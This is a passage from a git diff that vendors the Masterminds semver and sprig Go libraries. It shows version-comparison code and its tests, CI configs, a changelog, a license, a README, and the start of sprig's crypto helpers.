+// Versions are compared by X.Y.Z. Build metadata is ignored. Prerelease is
+// lower than the version without a prerelease.
+func (v *Version) Compare(o *Version) int {
+	// Compare the major, minor, and patch version for differences. If a
+	// difference is found return the comparison.
+	if d := compareSegment(v.Major(), o.Major()); d != 0 {
+		return d
+	}
+	if d := compareSegment(v.Minor(), o.Minor()); d != 0 {
+		return d
+	}
+	if d := compareSegment(v.Patch(), o.Patch()); d != 0 {
+		return d
+	}
+
+	// At this point the major, minor, and patch versions are the same.
+	ps := v.pre
+	po := o.Prerelease()
+
+	if ps == "" && po == "" {
+		return 0
+	}
+	if ps == "" {
+		return 1
+	}
+	if po == "" {
+		return -1
+	}
+
+	return comparePrerelease(ps, po)
+}
+
+// UnmarshalJSON implements JSON.Unmarshaler interface.
+func (v *Version) UnmarshalJSON(b []byte) error {
+	var s string
+	if err := json.Unmarshal(b, &s); err != nil {
+		return err
+	}
+	temp, err := NewVersion(s)
+	if err != nil {
+		return err
+	}
+	v.major = temp.major
+	v.minor = temp.minor
+	v.patch = temp.patch
+	v.pre = temp.pre
+	v.metadata = temp.metadata
+	v.original = temp.original
+	temp = nil
+	return nil
+}
+
+// MarshalJSON implements JSON.Marshaler interface.
+func (v *Version) MarshalJSON() ([]byte, error) {
+	return json.Marshal(v.String())
+}
+
+func compareSegment(v, o int64) int {
+	if v < o {
+		return -1
+	}
+	if v > o {
+		return 1
+	}
+
+	return 0
+}
+
+func comparePrerelease(v, o string) int {
+
+	// split the prelease versions by their part. The separator, per the spec,
+	// is a .
+	sparts := strings.Split(v, ".")
+	oparts := strings.Split(o, ".")
+
+	// Find the longer length of the parts to know how many loop iterations to
+	// go through.
+	slen := len(sparts)
+	olen := len(oparts)
+
+	l := slen
+	if olen > slen {
+		l = olen
+	}
+
+	// Iterate over each part of the prereleases to compare the differences.
+	for i := 0; i < l; i++ {
+		// Since the lentgh of the parts can be different we need to create
+		// a placeholder. This is to avoid out of bounds issues.
+		stemp := ""
+		if i < slen {
+			stemp = sparts[i]
+		}
+
+		otemp := ""
+		if i < olen {
+			otemp = oparts[i]
+		}
+
+		d := comparePrePart(stemp, otemp)
+		if d != 0 {
+			return d
+		}
+	}
+
+	// Reaching here means two versions are of equal value but have different
+	// metadata (the part following a +). They are not identical in string form
+	// but the version comparison finds them to be equal.
+	return 0
+}
+
+func comparePrePart(s, o string) int {
+	// Fastpath if they are equal
+	if s == o {
+		return 0
+	}
+
+	// When s or o are empty we can use the other in an attempt to determine
+	// the response.
+	if s == "" {
+		if o != "" {
+			return -1
+		}
+		return 1
+	}
+
+	if o == "" {
+		if s != "" {
+			return 1
+		}
+		return -1
+	}
+
+	// When comparing strings "99" is greater than "103". To handle
+	// cases like this we need to detect numbers and compare them.
+
+	oi, n1 := strconv.ParseInt(o, 10, 64)
+	si, n2 := strconv.ParseInt(s, 10, 64)
+
+	// The case where both are strings compare the strings
+	if n1 != nil && n2 != nil {
+		if s > o {
+			return 1
+		}
+		return -1
+	} else if n1 != nil {
+		// o is a string and s is a number
+		return -1
+	} else if n2 != nil {
+		// s is a string and o is a number
+		return 1
+	}
+	// Both are numbers
+	if si > oi {
+		return 1
+	}
+	return -1
+
+}
diff --git a/vendor/github.com/Masterminds/semver/version_test.go b/vendor/github.com/Masterminds/semver/version_test.go
new file mode 100644
index 0000000000..ff5d644a74
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version_test.go
@@ -0,0 +1,490 @@
+package semver
+
+import (
+	"encoding/json"
+	"fmt"
+	"testing"
+)
+
+func TestNewVersion(t *testing.T) {
+	tests := []struct {
+		version string
+		err     bool
+	}{
+		{"1.2.3", false},
+		{"v1.2.3", false},
+		{"1.0", false},
+		{"v1.0", false},
+		{"1", false},
+		{"v1", false},
+		{"1.2.beta", true},
+		{"v1.2.beta", true},
+		{"foo", true},
+		{"1.2-5", false},
+		{"v1.2-5", false},
+		{"1.2-beta.5", false},
+		{"v1.2-beta.5", false},
+		{"\n1.2", true},
+		{"\nv1.2", true},
+		{"1.2.0-x.Y.0+metadata", false},
+		{"v1.2.0-x.Y.0+metadata", false},
+		{"1.2.0-x.Y.0+metadata-width-hypen", false},
+		{"v1.2.0-x.Y.0+metadata-width-hypen", false},
+		{"1.2.3-rc1-with-hypen", false},
+		{"v1.2.3-rc1-with-hypen", false},
+		{"1.2.3.4", true},
+		{"v1.2.3.4", true},
+		{"1.2.2147483648", false},
+		{"1.2147483648.3", false},
+		{"2147483648.3.0", false},
+	}
+
+	for _, tc := range tests {
+		_, err := NewVersion(tc.version)
+		if tc.err && err == nil {
+			t.Fatalf("expected error for version: %s", tc.version)
+		} else if !tc.err && err != nil {
+			t.Fatalf("error for version %s: %s", tc.version, err)
+		}
+	}
+}
+
+func TestOriginal(t *testing.T) {
+	tests := []string{
+		"1.2.3",
+		"v1.2.3",
+		"1.0",
+		"v1.0",
+		"1",
+		"v1",
+		"1.2-5",
+		"v1.2-5",
+		"1.2-beta.5",
+		"v1.2-beta.5",
+		"1.2.0-x.Y.0+metadata",
+		"v1.2.0-x.Y.0+metadata",
+		"1.2.0-x.Y.0+metadata-width-hypen",
+		"v1.2.0-x.Y.0+metadata-width-hypen",
+		"1.2.3-rc1-with-hypen",
+		"v1.2.3-rc1-with-hypen",
+	}
+
+	for _, tc := range tests {
+		v, err := NewVersion(tc)
+		if err != nil {
+			t.Errorf("Error parsing version %s", tc)
+		}
+
+		o := v.Original()
+		if o != tc {
+			t.Errorf("Error retrieving originl. Expected '%s' but got '%s'", tc, v)
+		}
+	}
+}
+
+func TestParts(t *testing.T) {
+	v, err := NewVersion("1.2.3-beta.1+build.123")
+	if err != nil {
+		t.Error("Error parsing version 1.2.3-beta.1+build.123")
+	}
+
+	if v.Major() != 1 {
+		t.Error("Major() returning wrong value")
+	}
+	if v.Minor() != 2 {
+		t.Error("Minor() returning wrong value")
+	}
+	if v.Patch() != 3 {
+		t.Error("Patch() returning wrong value")
+	}
+	if v.Prerelease() != "beta.1" {
+		t.Error("Prerelease() returning wrong value")
+	}
+	if v.Metadata() != "build.123" {
+		t.Error("Metadata() returning wrong value")
+	}
+}
+
+func TestString(t *testing.T) {
+	tests := []struct {
+		version  string
+		expected string
+	}{
+		{"1.2.3", "1.2.3"},
+		{"v1.2.3", "1.2.3"},
+		{"1.0", "1.0.0"},
+		{"v1.0", "1.0.0"},
+		{"1", "1.0.0"},
+		{"v1", "1.0.0"},
+		{"1.2-5", "1.2.0-5"},
+		{"v1.2-5", "1.2.0-5"},
+		{"1.2-beta.5", "1.2.0-beta.5"},
+		{"v1.2-beta.5", "1.2.0-beta.5"},
+		{"1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+		{"v1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+		{"1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+		{"v1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+		{"1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+		{"v1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+	}
+
+	for _, tc := range tests {
+		v, err := NewVersion(tc.version)
+		if err != nil {
+			t.Errorf("Error parsing version %s", tc)
+		}
+
+		s := v.String()
+		if s != tc.expected {
+			t.Errorf("Error generating string. Expected '%s' but got '%s'", tc.expected, s)
+		}
+	}
+}
+
+func TestCompare(t *testing.T) {
+	tests := []struct {
+		v1       string
+		v2       string
+		expected int
+	}{
+		{"1.2.3", "1.5.1", -1},
+		{"2.2.3", "1.5.1", 1},
+		{"2.2.3", "2.2.2", 1},
+		{"3.2-beta", "3.2-beta", 0},
+		{"1.3", "1.1.4", 1},
+		{"4.2", "4.2-beta", 1},
+		{"4.2-beta", "4.2", -1},
+		{"4.2-alpha", "4.2-beta", -1},
+		{"4.2-alpha", "4.2-alpha", 0},
+		{"4.2-beta.2", "4.2-beta.1", 1},
+		{"4.2-beta2", "4.2-beta1", 1},
+		{"4.2-beta", "4.2-beta.2", -1},
+		{"4.2-beta", "4.2-beta.foo", -1},
+		{"4.2-beta.2", "4.2-beta", 1},
+		{"4.2-beta.foo", "4.2-beta", 1},
+		{"1.2+bar", "1.2+baz", 0},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := NewVersion(tc.v2)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		a := v1.Compare(v2)
+		e := tc.expected
+		if a != e {
+			t.Errorf(
+				"Comparison of '%s' and '%s' failed. Expected '%d', got '%d'",
+				tc.v1, tc.v2, e, a,
+			)
+		}
+	}
+}
+
+func TestLessThan(t *testing.T) {
+	tests := []struct {
+		v1       string
+		v2       string
+		expected bool
+	}{
+		{"1.2.3", "1.5.1", true},
+		{"2.2.3", "1.5.1", false},
+		{"3.2-beta", "3.2-beta", false},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := NewVersion(tc.v2)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		a := v1.LessThan(v2)
+		e := tc.expected
+		if a != e {
+			t.Errorf(
+				"Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+				tc.v1, tc.v2, e, a,
+			)
+		}
+	}
+}
+
+func TestGreaterThan(t *testing.T) {
+	tests := []struct {
+		v1       string
+		v2       string
+		expected bool
+	}{
+		{"1.2.3", "1.5.1", false},
+		{"2.2.3", "1.5.1", true},
+		{"3.2-beta", "3.2-beta", false},
+		{"3.2.0-beta.1", "3.2.0-beta.5", false},
+		{"3.2-beta.4", "3.2-beta.2", true},
+		{"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.103", false},
+		{"7.43.0-SNAPSHOT.FOO", "7.43.0-SNAPSHOT.103", true},
+		{"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.BAR", false},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := NewVersion(tc.v2)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		a := v1.GreaterThan(v2)
+		e := tc.expected
+		if a != e {
+			t.Errorf(
+				"Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+				tc.v1, tc.v2, e, a,
+			)
+		}
+	}
+}
+
+func TestEqual(t *testing.T) {
+	tests := []struct {
+		v1       string
+		v2       string
+		expected bool
+	}{
+		{"1.2.3", "1.5.1", false},
+		{"2.2.3", "1.5.1", false},
+		{"3.2-beta", "3.2-beta", true},
+		{"3.2-beta+foo", "3.2-beta+bar", true},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := NewVersion(tc.v2)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		a := v1.Equal(v2)
+		e := tc.expected
+		if a != e {
+			t.Errorf(
+				"Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+				tc.v1, tc.v2, e, a,
+			)
+		}
+	}
+}
+
+func TestInc(t *testing.T) {
+	tests := []struct {
+		v1               string
+		expected         string
+		how              string
+		expectedOriginal string
+	}{
+		{"1.2.3", "1.2.4", "patch", "1.2.4"},
+		{"v1.2.4", "1.2.5", "patch", "v1.2.5"},
+		{"1.2.3", "1.3.0", "minor", "1.3.0"},
+		{"v1.2.4", "1.3.0", "minor", "v1.3.0"},
+		{"1.2.3", "2.0.0", "major", "2.0.0"},
+		{"v1.2.4", "2.0.0", "major", "v2.0.0"},
+		{"1.2.3+meta", "1.2.4", "patch", "1.2.4"},
+		{"1.2.3-beta+meta", "1.2.3", "patch", "1.2.3"},
+		{"v1.2.4-beta+meta", "1.2.4", "patch", "v1.2.4"},
+		{"1.2.3-beta+meta", "1.3.0", "minor", "1.3.0"},
+		{"v1.2.4-beta+meta", "1.3.0", "minor", "v1.3.0"},
+		{"1.2.3-beta+meta", "2.0.0", "major", "2.0.0"},
+		{"v1.2.4-beta+meta", "2.0.0", "major", "v2.0.0"},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+		var v2 Version
+		switch tc.how {
+		case "patch":
+			v2 = v1.IncPatch()
+		case "minor":
+			v2 = v1.IncMinor()
+		case "major":
+			v2 = v1.IncMajor()
+		}
+
+		a := v2.String()
+		e := tc.expected
+		if a != e {
+			t.Errorf(
+				"Inc %q failed. Expected %q got %q",
+				tc.how, e, a,
+			)
+		}
+
+		a = v2.Original()
+		e = tc.expectedOriginal
+		if a != e {
+			t.Errorf(
+				"Inc %q failed. Expected original %q got %q",
+				tc.how, e, a,
+			)
+		}
+	}
+}
+
+func TestSetPrerelease(t *testing.T) {
+	tests := []struct {
+		v1                 string
+		prerelease         string
+		expectedVersion    string
+		expectedPrerelease string
+		expectedOriginal   string
+		expectedErr        error
+	}{
+		{"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidPrerelease},
+		{"1.2.3", "beta", "1.2.3-beta", "beta", "1.2.3-beta", nil},
+		{"v1.2.4", "beta", "1.2.4-beta", "beta", "v1.2.4-beta", nil},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := v1.SetPrerelease(tc.prerelease)
+		if err != tc.expectedErr {
+			t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+		}
+
+		a := v2.Prerelease()
+		e := tc.expectedPrerelease
+		if a != e {
+			t.Errorf("Expected prerelease value=%q, but got %q", e, a)
+		}
+
+		a = v2.String()
+		e = tc.expectedVersion
+		if a != e {
+			t.Errorf("Expected version string=%q, but got %q", e, a)
+		}
+
+		a = v2.Original()
+		e = tc.expectedOriginal
+		if a != e {
+			t.Errorf("Expected version original=%q, but got %q", e, a)
+		}
+	}
+}
+
+func TestSetMetadata(t *testing.T) {
+	tests := []struct {
+		v1               string
+		metadata         string
+		expectedVersion  string
+		expectedMetadata string
+		expectedOriginal string
+		expectedErr      error
+	}{
+		{"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidMetadata},
+		{"1.2.3", "meta", "1.2.3+meta", "meta", "1.2.3+meta", nil},
+		{"v1.2.4", "meta", "1.2.4+meta", "meta", "v1.2.4+meta", nil},
+	}
+
+	for _, tc := range tests {
+		v1, err := NewVersion(tc.v1)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		v2, err := v1.SetMetadata(tc.metadata)
+		if err != tc.expectedErr {
+			t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+		}
+
+		a := v2.Metadata()
+		e := tc.expectedMetadata
+		if a != e {
+			t.Errorf("Expected metadata value=%q, but got %q", e, a)
+		}
+
+		a = v2.String()
+		e = tc.expectedVersion
+		if e != a {
+			t.Errorf("Expected version string=%q, but got %q", e, a)
+		}
+
+		a = v2.Original()
+		e = tc.expectedOriginal
+		if a != e {
+			t.Errorf("Expected version original=%q, but got %q", e, a)
+		}
+	}
+}
+
+func TestOriginalVPrefix(t *testing.T) {
+	tests := []struct {
+		version string
+		vprefix string
+	}{
+		{"1.2.3", ""},
+		{"v1.2.4", "v"},
+	}
+
+	for _, tc := range tests {
+		v1, _ := NewVersion(tc.version)
+		a := v1.originalVPrefix()
+		e := tc.vprefix
+		if a != e {
+			t.Errorf("Expected vprefix=%q, but got %q", e, a)
+		}
+	}
+}
+
+func TestJsonMarshal(t *testing.T) {
+	sVer := "1.1.1"
+	x, err := NewVersion(sVer)
+	if err != nil {
+		t.Errorf("Error creating version: %s", err)
+	}
+	out, err2 := json.Marshal(x)
+	if err2 != nil {
+		t.Errorf("Error marshaling version: %s", err2)
+	}
+	got := string(out)
+	want := fmt.Sprintf("%q", sVer)
+	if got != want {
+		t.Errorf("Error marshaling unexpected marshaled content: got=%q want=%q", got, want)
+	}
+}
+
+func TestJsonUnmarshal(t *testing.T) {
+	sVer := "1.1.1"
+	ver := &Version{}
+	err := json.Unmarshal([]byte(fmt.Sprintf("%q", sVer)), ver)
+	if err != nil {
+		t.Errorf("Error unmarshaling version: %s", err)
+	}
+	got := ver.String()
+	want := sVer
+	if got != want {
+		t.Errorf("Error unmarshaling unexpected object content: got=%q want=%q", got, want)
+	}
+}
diff --git a/vendor/github.com/Masterminds/sprig/.gitignore b/vendor/github.com/Masterminds/sprig/.gitignore
new file mode 100644
index 0000000000..5e3002f88f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.gitignore
@@ -0,0 +1,2 @@
+vendor/
+/.glide
diff --git a/vendor/github.com/Masterminds/sprig/.travis.yml b/vendor/github.com/Masterminds/sprig/.travis.yml
new file mode 100644
index 0000000000..2e7c2d68e3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.travis.yml
@@ -0,0 +1,23 @@
+language: go
+
+go:
+  - 1.9.x
+  - 1.10.x
+  - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+  - make setup test
+
+notifications:
+  webhooks:
+    urls:
+      - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+    on_success: change  # options: [always|never|change] default: always
+    on_failure: always  # options: [always|never|change] default: always
+    on_start: never     # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/sprig/CHANGELOG.md b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
new file mode 100644
index 0000000000..445937138a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
@@ -0,0 +1,153 @@
+# Changelog
+
+## Release 2.15.0 (2018-04-02)
+
+### Added
+
+- #68 and #69: Add json helpers to docs (thanks @arunvelsriram)
+- #66: Add ternary function (thanks @binoculars)
+- #67: Allow keys function to take multiple dicts (thanks @binoculars)
+- #89: Added sha1sum to crypto function (thanks @benkeil)
+- #81: Allow customizing Root CA that used by genSignedCert (thanks @chenzhiwei)
+- #92: Add travis testing for go 1.10
+- #93: Adding appveyor config for windows testing
+
+### Changed
+
+- #90: Updating to more recent dependencies
+- #73: replace satori/go.uuid with google/uuid (thanks @petterw)
+
+### Fixed
+
+- #76: Fixed documentation typos (thanks @Thiht)
+- Fixed rounding issue on the `ago` function. Note, the removes support for Go 1.8 and older
+
+## Release 2.14.1 (2017-12-01)
+
+### Fixed
+
+- #60: Fix typo in function name documentation (thanks @neil-ca-moore)
+- #61: Removing line with {{ due to blocking github pages genertion
+- #64: Update the list functions to handle int, string, and other slices for compatibility
+
+## Release 2.14.0 (2017-10-06)
+
+This new version of Sprig adds a set of functions for generating and working with SSL certificates.
+
+- `genCA` generates an SSL Certificate Authority
+- `genSelfSignedCert` generates an SSL self-signed certificate
+- `genSignedCert` generates an SSL certificate and key based on a given CA
+
+## Release 2.13.0 (2017-09-18)
+
+This release adds new functions, including:
+
+- `regexMatch`, `regexFindAll`, `regexFind`, `regexReplaceAll`, `regexReplaceAllLiteral`, and `regexSplit` to work with regular expressions
+- `floor`, `ceil`, and `round` math functions
+- `toDate` converts a string to a date
+- `nindent` is just like `indent` but also prepends a new line
+- `ago` returns the time from `time.Now`
+
+### Added
+
+- #40: Added basic regex functionality (thanks @alanquillin)
+- #41: Added ceil floor and round functions (thanks @alanquillin)
+- #48: Added toDate function (thanks @andreynering)
+- #50: Added nindent function (thanks @binoculars)
+- #46: Added ago function (thanks @slayer)
+
+### Changed
+
+- #51: Updated godocs to include new string functions (thanks @curtisallen)
+- #49: Added ability to merge multiple dicts (thanks @binoculars)
+
+## Release 2.12.0 (2017-05-17)
+
+- `snakecase`, `camelcase`, and `shuffle` are three new string functions
+- `fail` allows you to bail out of a template render when conditions are not met
+
+## Release 2.11.0 (2017-05-02)
+
+- Added `toJson` and `toPrettyJson`
+- Added `merge`
+- Refactored documentation
+
+## Release 2.10.0 (2017-03-15)
+
+- Added `semver` and `semverCompare` for Semantic Versions
+- `list` replaces `tuple`
+- Fixed issue with `join`
+- Added `first`, `last`, `intial`, `rest`, `prepend`, `append`, `toString`, `toStrings`, `sortAlpha`, `reverse`, `coalesce`, `pluck`, `pick`, `compact`, `keys`, `omit`, `uniq`, `has`, `without`
+
+## Release 2.9.0 (2017-02-23)
+
+- Added `splitList` to split a list
+- Added crypto functions of `genPrivateKey` and `derivePassword`
+
+## Release 2.8.0 (2016-12-21)
+
+- Added access to several path functions (`base`, `dir`, `clean`, `ext`, and `abs`)
+- Added functions for _mutating_ dictionaries (`set`, `unset`, `hasKey`)
+
+## Release 2.7.0 (2016-12-01)
+
+- Added `sha256sum` to generate a hash of an input
+- Added functions to convert a numeric or string to `int`, `int64`, `float64`
+
+## Release 2.6.0 (2016-10-03)
+
+- Added a `uuidv4` template function for generating UUIDs inside of a template.
+
+## Release 2.5.0 (2016-08-19)
+
+- New `trimSuffix`, `trimPrefix`, `hasSuffix`, and `hasPrefix` functions
+- New aliases have been added for a few functions that didn't follow the naming conventions (`trimAll` and `abbrevBoth`)
+- `trimall` and `abbrevboth` (notice the case) are deprecated and will be removed in 3.0.0
+
+## Release 2.4.0 (2016-08-16)
+
+- Adds two functions: `until` and `untilStep`
+
+## Release 2.3.0 (2016-06-21)
+
+- cat: Concatenate strings with whitespace separators.
+- replace: Replace parts of a string: `replace " " "-" "Me First"` renders "Me-First"
+- plural: Format plurals: `len "foo" | plural "one foo" "many foos"` renders "many foos"
+- indent: Indent blocks of text in a way that is sensitive to "\n" characters.
+
+## Release 2.2.0 (2016-04-21)
+
+- Added a `genPrivateKey` function (Thanks @bacongobbler)
+
+## Release 2.1.0 (2016-03-30)
+
+- `default` now prints the default value when it does not receive a value down the pipeline. It is much safer now to do `{{.Foo | default "bar"}}`.
+- Added accessors for "hermetic" functions. These return only functions that, when given the same input, produce the same output.
+
+## Release 2.0.0 (2016-03-29)
+
+Because we switched from `int` to `int64` as the return value for all integer math functions, the library's major version number has been incremented.
+
+- `min` complements `max` (formerly `biggest`)
+- `empty` indicates that a value is the empty value for its type
+- `tuple` creates a tuple inside of a template: `{{$t := tuple "a", "b" "c"}}`
+- `dict` creates a dictionary inside of a template `{{$d := dict "key1" "val1" "key2" "val2"}}` 
+- Date formatters have been added for HTML dates (as used in `date` input fields)
+- Integer math functions can convert from a number of types, including `string` (via `strconv.ParseInt`).
+
+## Release 1.2.0 (2016-02-01)
+
+- Added quote and squote
+- Added b32enc and b32dec
+- add now takes varargs
+- biggest now takes varargs
+
+## Release 1.1.0 (2015-12-29)
+
+- Added #4: Added contains function. strings.Contains, but with the arguments
+  switched to simplify common pipelines. (thanks krancour)
+- Added Travis-CI testing support
+
+## Release 1.0.0 (2015-12-23)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/sprig/LICENSE.txt b/vendor/github.com/Masterminds/sprig/LICENSE.txt
new file mode 100644
index 0000000000..5c95accc2e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/LICENSE.txt
@@ -0,0 +1,20 @@
+Sprig
+Copyright (C) 2013 Masterminds
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/sprig/Makefile b/vendor/github.com/Masterminds/sprig/Makefile
new file mode 100644
index 0000000000..63a93fdf79
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/Makefile
@@ -0,0 +1,13 @@
+
+HAS_GLIDE := $(shell command -v glide;)
+
+.PHONY: test
+test:
+	go test -v .
+
+.PHONY: setup
+setup:
+ifndef HAS_GLIDE
+	go get -u github.com/Masterminds/glide
+endif
+	glide install
diff --git a/vendor/github.com/Masterminds/sprig/README.md b/vendor/github.com/Masterminds/sprig/README.md
new file mode 100644
index 0000000000..25bf3d4f4b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/README.md
@@ -0,0 +1,81 @@
+# Sprig: Template functions for Go templates
+[![Stability: Sustained](https://masterminds.github.io/stability/sustained.svg)](https://masterminds.github.io/stability/sustained.html)
+[![Build Status](https://travis-ci.org/Masterminds/sprig.svg?branch=master)](https://travis-ci.org/Masterminds/sprig)
+
+The Go language comes with a [built-in template
+language](http://golang.org/pkg/text/template/), but not
+very many template functions. This library provides a group of commonly
+used template functions.
+
+It is inspired by the template functions found in
+[Twig](http://twig.sensiolabs.org/documentation) and also in various
+JavaScript libraries, such as [underscore.js](http://underscorejs.org/).
+
+## Usage
+
+Template developers can read the [Sprig function documentation](http://masterminds.github.io/sprig/) to
+learn about the >100 template functions available.
+
+For Go developers wishing to include Sprig as a library in their programs,
+API documentation is available [at GoDoc.org](http://godoc.org/github.com/Masterminds/sprig), but
+read on for standard usage.
+
+### Load the Sprig library
+
+To load the Sprig `FuncMap`:
+
+```go
+
+import (
+  "github.com/Masterminds/sprig"
+  "html/template"
+)
+
+// This example illustrates that the FuncMap *must* be set before the
+// templates themselves are loaded.
+tpl := template.Must(
+  template.New("base").Funcs(sprig.FuncMap()).ParseGlob("*.html")
+)
+
+
+```
+
+### Call the functions inside of templates
+
+By convention, all functions are lowercase. This seems to follow the Go
+idiom for template functions (as opposed to template methods, which are
+TitleCase).
+
+
+Example:
+
+```
+{{ "hello!" | upper | repeat 5 }}
+```
+
+Produces:
+
+```
+HELLO!HELLO!HELLO!HELLO!HELLO!
+```
+
+## Principles:
+
+The following principles were used in deciding on which functions to add, and
+determining how to implement them.
+
+- Template functions should be used to build layout. Therefore, the following
+  types of operations are within the domain of template functions:
+  - Formatting
+  - Layout
+  - Simple type conversions
+  - Utilities that assist in handling common formatting and layout needs (e.g. arithmetic)
+- Template functions should not return errors unless there is no way to print
+  a sensible value. For example, converting a string to an integer should not
+  produce an error if conversion fails. Instead, it should display a default
+  value that can be displayed.
+- Simple math is necessary for grid layouts, pagers, and so on. Complex math
+  (anything other than arithmetic) should be done outside of templates.
+- Template functions only deal with the data passed into them. They never retrieve
+  data from a source.
+- Finally, do not override core Go template functions.
diff --git a/vendor/github.com/Masterminds/sprig/appveyor.yml b/vendor/github.com/Masterminds/sprig/appveyor.yml
new file mode 100644
index 0000000000..d545a987a3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/appveyor.yml
@@ -0,0 +1,26 @@
+
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\sprig
+shallow_clone: true
+
+environment:
+  GOPATH: C:\gopath
+
+platform:
+  - x64
+
+install:
+  - go get -u github.com/Masterminds/glide
+  - set PATH=%GOPATH%\bin;%PATH%
+  - go version
+  - go env
+
+build_script:
+  - glide install
+  - go install ./...
+
+test_script:
+  - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/sprig/crypto.go b/vendor/github.com/Masterminds/sprig/crypto.go
new file mode 100644
index 0000000000..a91c4a7045
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto.go
@@ -0,0 +1,430 @@
+package sprig
+
+import (
+	"bytes"
+	"crypto/dsa"
+	"crypto/ecdsa"
+	"crypto/elliptic"
+	"crypto/hmac"
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/sha1"
+	"crypto/sha256"
+	"crypto/x509"
+	"crypto/x509/pkix"
+	"encoding/asn1"
+	"encoding/base64"
+	"encoding/binary"
+	"encoding/hex"
+	"encoding/pem"
+	"errors"
+	"fmt"
+	"math/big"
+	"net"
+	"time"
+
+	"github.com/google/uuid"
+	"golang.org/x/crypto/scrypt"
+)
+
+func sha256sum(input string) string {
+	hash := sha256.Sum256([]byte(input))
+	return hex.EncodeToString(hash[:])
+}
+
+func sha1sum(input string) string {
+	hash := sha1.Sum([]byte(input))
+	return hex.EncodeToString(hash[:])
+}
+
+// uuidv4 provides a safe and secure UUID v4 implementation
+func uuidv4() string {
+	return fmt.Sprintf("%s", uuid.New())
+}
+
+var master_password_seed = "com.lyndir.masterpassword"
+
+var password_type_templates = map[string][][]byte{
+	"maximum": {[]byte("anoxxxxxxxxxxxxxxxxx"), []byte("axxxxxxxxxxxxxxxxxno")},
+	"long": {[]byte("CvcvnoCvcvCvcv"), []byte("CvcvCvcvnoCvcv"), []byte("CvcvCvcvCvcvno"), []byte("CvccnoCvcvCvcv"), []byte("CvccCvcvnoCvcv"),
+		[]byte("CvccCvcvCvcvno"), []byte("CvcvnoCvccCvcv"), []byte("CvcvCvccnoCvcv"), []byte("CvcvCvccCvcvno"), []byte("CvcvnoCvcvCvcc"),
